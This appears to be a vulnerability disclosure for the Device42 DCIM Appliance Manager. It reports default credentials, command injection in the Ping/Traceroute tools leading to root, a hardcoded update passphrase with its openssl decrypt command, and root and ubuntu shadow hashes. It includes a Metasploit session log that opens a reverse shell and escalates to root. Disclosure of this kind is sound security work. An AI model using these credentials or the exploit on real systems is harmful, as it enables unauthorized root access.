Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0

http://www.device42.com/download/



 Device42 ships virtual appliances ready for production use as a trial
(essentially dictated by the license provided).


 The Appliance Manager listens on HTTP (no SSL) on port 4242 with default
credentials of d42admin:default.


 Within the Appliance Manager, the Ping and Traceroute utilities are
susceptible to command injection via bash metacharacters. The user which
the commands get executed under is the 'ubuntu' user, but this user has
passwordless sudo ability, so it is essentially root access. Two exploits
are provided that exploit these vulnerabilities using the default
credentials.


 Updates from device42 are encrypted by default to prevent users from
creating their own updates and uploading them, but the password for the
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own
encrypted update using this passphrase.


 openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass
pass:zofo8REgqM


 Also, the root and ubuntu users have default passwords in the shadow file.


 Root –
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10


 Ubuntu –
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/






















 msf exploit(device42_tracert_exec) > show options


 Module options (exploit/linux/http/device42_tracert_exec):


 Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no Use a proxy chain

RHOST 192.168.1.81 yes The target address

RPORT 4242 yes The target port

VHOST no HTTP server virtual host



 Payload options (cmd/unix/reverse):


 Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.1.31 yes The listen address

LPORT 4444 yes The listen port



 Exploit target:


 Id Name

-- ----

0 Automatic Targeting



 msf exploit(device42_tracert_exec) > exploit


 [*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo YWFxSIuVtNUMShSi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket A

[*] A: "YWFxSIuVtNUMShSi\r\n"

[*] Matching...

[*] B is input...

[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878)
at 2014-11-22 17:36:59 -0600


 sudo su

id

uid=0(root) gid=0(root) groups=0(root)

exit

id

uid=1000(ubuntu) gid=1000(ubuntu)
groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website